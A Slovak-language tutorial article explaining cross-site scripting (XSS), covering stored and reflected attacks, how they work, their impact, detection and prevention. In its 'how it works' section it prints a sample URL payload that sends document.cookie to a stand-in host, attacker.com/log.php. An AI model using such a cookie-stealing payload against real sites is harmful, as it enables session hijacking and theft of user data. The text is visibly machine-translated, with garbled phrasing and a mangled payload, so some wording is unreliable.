Úvod do skriptovania na viacerých stránkach

  • S rastúcim počtom webových aplikácií na internete sa webová bezpečnosť stala dôležitým problémom. Hackovanie a odcudzenie súkromných údajov používateľov je teraz bežné a hrozí im použitie akejkoľvek aplikácie. Cross Site Scripting je jedným z populárnych útokov na webovú bezpečnosť používateľov. Pozrime sa, čo je skriptovanie naprieč stránkami.
  • Cross Site Scripting nazývaný XSS je chyba zabezpečenia počítača, pri ktorej sa útočník zameriava na pridanie škodlivého kódu vo forme skriptov na dôveryhodnú webovú stránku / webovú stránku. Je to útok vstrekovania kódu na strane klienta a škodlivý skript sa spustí vo webovom prehliadači používateľa, keď vstúpi na túto webovú stránku / webovú stránku. Tieto webové stránky sa nepriamo stávajú médiom na odosielanie škodlivého kódu používateľovi. Vstrekovaním skriptov útočníci obchádzajú DOM (Document Object Model) bezpečnostných obmedzení a získajú prístup k obsahu používateľov citlivých na stránku, k súborom cookie relácií, k histórii prehliadania väčšiny súkromných údajov, ktoré prehliadač udržuje.
  • Webové stránky obsahujúce fóra, vývesky, webové stránky, ktoré povoľujú komentáre, a tie, ktoré používajú neanitizovaný vstup používateľa a takto generovaný výstup, sú najzraniteľnejšie voči útokom XSS. Hoci útoky XSS sú možné vo verziách VBScript, ActiveX a CSS, v Javascripte sú najbežnejšie, pretože sú základom väčšiny prehliadacích funkcií.

Rôzne typy skriptovania na viacerých stránkach (XSS)

Aj keď neexistuje osobitná klasifikácia skriptovania medzi lokalitami, niektorí odborníci ju klasifikovali do dvoch typov, ktoré sú podrobne opísané nižšie:

Uložené útoky XSS :

  • Uložené XSS sú tie, v ktorých sa škodlivý skript vložený útočníkom uloží do databázy a spustí sa v prehliadači používateľa, keď sa pokúša nejakým spôsobom získať prístup k databáze. Sú známe aj ako perzistentné alebo uložené XSS. Je to jeden z najničivejších útokov a stáva sa to najmä vtedy, keď webová stránka / webová stránka umožňuje pridávať komentáre alebo umožňuje vkladanie obsahu HTML.
  • Útočník pridá javascript do komentára, ktorý sa uloží do databázy a keď používateľ vstúpi na dotknutú stránku a načíta údaje z databázy, ktorá vo svojom prehliadači spúšťa škodlivý skript a útočník získa neoprávnený prístup k jeho súkromným údajom.
  • Napríklad na webovej stránke elektronického obchodu, ako je Olx, ktorá má neanitizované okno so správou pre popis produktu, útočník, ktorý je predajcom produktu, doň pridá škodlivý javascript a uloží sa do databázy webovej stránky.
  • Keď kupujúci otvorí popis produktu a zobrazí sa podrobnosti o produkte, stane sa obeťou, pretože skript sa spustí v jeho webovom prehliadači a všetky podrobnosti o používateľovi, ktorý prehliadač umožňuje, budú unesené.

Postup XSS útoky:

  • Toto je jeden z najbežnejších spôsobov, ako môže útočník spôsobiť používateľovi XSS útok. V prípade útokov XSS v zásade útočník zacieľuje na obeť zaslaním e-mailu, škodlivého odkazu alebo pripojením výsledku vyhľadávania, ktorý ukazuje na dôveryhodnú webovú stránku, ale obsahuje škodlivý kód javascript.
  • Ak obeť klikne na túto adresu URL, iniciuje požiadavku HTTP a pošle žiadosť zraniteľnej webovej aplikácii. Žiadosť sa potom obeti vráti s odpoveďou vloženého javascriptového kódu, ktorý webový prehliadač vykoná, ak ho vezme na vedomie z dôveryhodnej webovej stránky, čoho výsledkom je únos dôverných údajov jeho prehliadača.
  • Napríklad na webovej stránke elektronického obchodu je vyhľadávacie pole, v ktorom môže užívateľ prehľadávať položky a reťazec napísaný vo vyhľadávacom poli je viditeľný v URL webovej stránky, keď je požiadavka na vyhľadávanie odoslaná na server.
  • Útočník vytvorí odkaz, v ktorom je škodlivý skript v adrese URL zreťazený a pošle ho obeti prostredníctvom e-mailu. Keď obeť otvorí tento odkaz, žiadosť sa pošle na škodlivú webovú stránku útočníka a všetky údaje prehliadača obete budú unesené a odoslané do systému útočníka.

Ako funguje skriptovanie medzi stránkami (XSS)?

  • V zraniteľnosti krížového skriptovania stránok (XSS) je hlavným motívom útočníka útočník ukradnúť údaje používateľa spustením škodlivého skriptu v jeho prehliadači, ktorý je vložený do obsahu webovej stránky, ktorý používateľ používa rôznymi spôsobmi.
  • Napríklad, keď používateľ vyhľadáva nejaký text na webovej stránke, žiadosť sa odošle na server vo forme:

https://www.abcwebsite.com/search?q=text1

Vo výsledku vyhľadávania web vráti výsledok spolu s tým, čo používateľ hľadal, napríklad:

Hľadali ste: text1

Ak je funkcia vyhľadávania zraniteľná voči XSS, útočník môže do adresy URL pridať škodlivý skript:

https://www.abcwebsite.com/search= location document = https: //attacker.com/log.php? c = '+ encodeURIComponent (document.cookie)
  • Keď obeť klikne na tento odkaz, presmeruje sa na škodlivú webovú stránku, tj https://attacker.com a všetky údaje prehľadávača sa odošlú priamo do počítača útočníka, čo útočníkovi ukradne všetky tokeny relácie / súbory cookie.
  • Útočník týmto spôsobom vloží do URL svoj škodlivý skript, môže tiež uložiť tento skript na server, ktorý spadá pod Uloženú XSS.

Vplyv zraniteľností skriptovania na viacerých stránkach:

Dopad skriptovania na viacerých stránkach sa veľmi líši. Po zneužití zraniteľnosti XSS získa útočník plnú kontrolu nad prehliadačom obete a môže vykonávať rôzne akcie, ktoré sa líšia od malých, ako napríklad prezeranie histórie prehliadača, až po katastrofálne udalosti, ako je vloženie červov do počítača.

Niektoré z akcií, ktoré môže útočník vykonať zneužitím zraniteľnosti XSS, sú nasledujúce: -

  1. Netesné citlivé informácie, napríklad používateľské meno a heslo.
  2. Vkladanie červov do počítača.
  3. Presmerovanie používateľa na nebezpečnú webovú stránku a nútenie vykonať niektoré akcie
  4. Prístup k histórii prehliadania obete.
  5. Inštalácia programu trójskych koní.
  6. Vynútite používateľa, aby vykonával a upravoval hodnoty v aplikácii získaním prístupu

Nájdenie zraniteľností skriptovania na viacerých stránkach:

  • Chyby zabezpečenia XSS sa vyskytujú z dvoch dôvodov: vstup používateľa nie je pred odoslaním na server overený alebo výstup prijatý do prehliadača nie je kódovaný HTML. Vzhľadom na katastrofálny dopad zraniteľnosti XSS a ochranu súkromia používateľov je veľmi dôležité zistiť, či je webová aplikácia zraniteľná voči XSS alebo nie.
  • Aj keď je ťažké identifikovať a odstrániť XSS, najlepším spôsobom kontroly je vykonanie bezpečnostnej kontroly kódu a kontrola všetkých miest, kde môže vstup z požiadavky HTTP spôsobiť, že sa v aplikácii zobrazí ako výstup. Pri skenovaní a hľadaní slabých miest v aplikácii môže tiež pomôcť použitie nástrojov na automatické skenovanie zraniteľnosti, ktoré zahŕňajú špecializovaný modul skenera XSS na skenovanie celej webovej aplikácie.

Ako zabrániť prevencii XSS?

  • XSS je chyba zabezpečenia kódu, takže je veľmi dôležité kódovať údaje, ktoré sa odosielajú na server, a údaje, ktoré pochádzajú zo servera, do prehliadača používateľa.
  • Overenie údajov je tiež veľmi dôležité, aby prehliadač interpretoval kód bez škodlivých príkazov. Boli zavedené rôzne metódy prevencie, pri ktorých sú údaje o validácii a kódovaní ako priorita pre webovú stránku zraniteľné voči XSS.

Niektoré body je potrebné zamerať, aby sa zabránilo XSS: -

  1. Podpora sledovania HTTP na všetkých webových serveroch by sa mala vypnúť, pretože útočník môže ukradnúť údaje cookie a súkromného prehľadávača prostredníctvom volania sledovania HTTP zo servera, aj keď je v prehliadači obete deaktivovaný document.cookie.
  2. Vývojári by mali vstup dezinfikovať a nikdy by nemali vydávať údaje priamo prijaté od používateľa bez ich potvrdenia.
  3. Odkazy by sa mali vo všeobecnosti zakázať, ak nezačínajú protokolmi na bielej listine, ako napríklad HTTP: //, https: //, čím bránia použitiu schém URI, ako napríklad javascript: //

záver:

Útoky XSS sú nebezpečné a môžu poškodiť súkromie používateľa a ukradnúť údaje, pokiaľ bežný používateľ aplikáciu neprehliada. Vývojári by sa preto pri vývoji aplikácie mali riadiť prísnymi bezpečnostnými pravidlami, a to najmä pre dáta aj server, aby bola aplikácia najmenej zraniteľná voči XSS a aby sa na ňu mohlo spoľahnúť viac používateľov.

Odporúčané články

Toto bol návod na Čo je skriptovanie na viacerých stránkach ?. Tu diskutujeme o rôznych typoch cross-site, pracovných, dopadoch a prevencii XSS. Viac informácií nájdete aj v ďalších navrhovaných článkoch -

  1. Ako funguje JavaScript
  2. Čo je to útok Phishing?
  3. Čo je to počítačový útok?
  4. HTTP cache
  5. Ako fungujú súbory cookie v jazyku JavaScript s príkladom?

Kategórie: